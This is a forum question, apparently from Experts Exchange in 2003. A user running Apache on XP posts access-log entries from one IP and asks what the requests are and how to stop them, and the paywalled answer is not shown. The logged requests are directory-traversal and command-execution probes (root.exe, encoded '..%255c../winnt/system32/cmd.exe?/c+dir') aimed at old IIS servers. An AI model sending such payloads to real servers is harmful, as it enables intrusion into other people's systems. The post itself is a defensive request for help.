yodaj007
asked on
security problem, fix?
I'm getting a lot of GET requests from one particular IP addy, but I'm not sure what he's trying to do. Here's some of the log entries:
68.83.207.195 - - [24/Feb/2003:13:46:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.83.207.195 - - [24/Feb/2003:13:46:58 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.83.207.195 - - [24/Feb/2003:13:46:59 -0600] "GET /c/winnt/system32/cmd.exe? /c+dir HTTP/1.0" 404 292
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /d/winnt/system32/cmd.exe? /c+dir HTTP/1.0" 404 292
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /scripts/..%255c../winnt/s ystem32/cm d.exe?/c+d ir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:02 -0600] "GET /_vti_bin/..%255c../..%255 c../..%255 c../winnt/ system32/c md.exe?/c+ dir HTTP/1.0" 404 323
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /_mem_bin/..%255c../..%255 c../..%255 c../winnt/ system32/c md.exe?/c+ dir HTTP/1.0" 404 323
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /msadc/..%255c../..%255c.. /..%255c/. .%c1%1c../ ..%c1%1c.. /..%c1%1c. ./winnt/sy stem32/cmd .exe?/c+di r HTTP/1.0" 404 339
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c1%1c../winnt/ system32/c md.exe?/c+ dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c0%2f../winnt/ system32/c md.exe?/c+ dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c0%af../winnt/ system32/c md.exe?/c+ dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c1%9c../winnt/ system32/c md.exe?/c+ dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:06 -0600] "GET /scripts/..%%35%63../winnt /system32/ cmd.exe?/c +dir HTTP/1.0" 400 296
68.83.207.195 - - [24/Feb/2003:13:47:07 -0600] "GET /scripts/..%%35c../winnt/s ystem32/cm d.exe?/c+d ir HTTP/1.0" 400 296
68.83.207.195 - - [24/Feb/2003:13:47:08 -0600] "GET /scripts/..%25%35%63../win nt/system3 2/cmd.exe? /c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:09 -0600] "GET /scripts/..%252f../winnt/s ystem32/cm d.exe?/c+d ir HTTP/1.0" 404 306
========================== ========== =====
Please tell me what he's doing and what I can do to stop anything malicious. I'm running XP with the latest Apache.
Thanks,
(This questions worth a lot of points)
Jason
68.83.207.195 - - [24/Feb/2003:13:46:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.83.207.195 - - [24/Feb/2003:13:46:58 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.83.207.195 - - [24/Feb/2003:13:46:59 -0600] "GET /c/winnt/system32/cmd.exe?
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /d/winnt/system32/cmd.exe?
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /scripts/..%255c../winnt/s
68.83.207.195 - - [24/Feb/2003:13:47:02 -0600] "GET /_vti_bin/..%255c../..%255
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /_mem_bin/..%255c../..%255
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /msadc/..%255c../..%255c..
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c1%1c../winnt/
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c0%2f../winnt/
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c0%af../winnt/
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c1%9c../winnt/
68.83.207.195 - - [24/Feb/2003:13:47:06 -0600] "GET /scripts/..%%35%63../winnt
68.83.207.195 - - [24/Feb/2003:13:47:07 -0600] "GET /scripts/..%%35c../winnt/s
68.83.207.195 - - [24/Feb/2003:13:47:08 -0600] "GET /scripts/..%25%35%63../win
68.83.207.195 - - [24/Feb/2003:13:47:09 -0600] "GET /scripts/..%252f../winnt/s
==========================
Please tell me what he's doing and what I can do to stop anything malicious. I'm running XP with the latest Apache.
Thanks,
(This questions worth a lot of points)
Jason
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.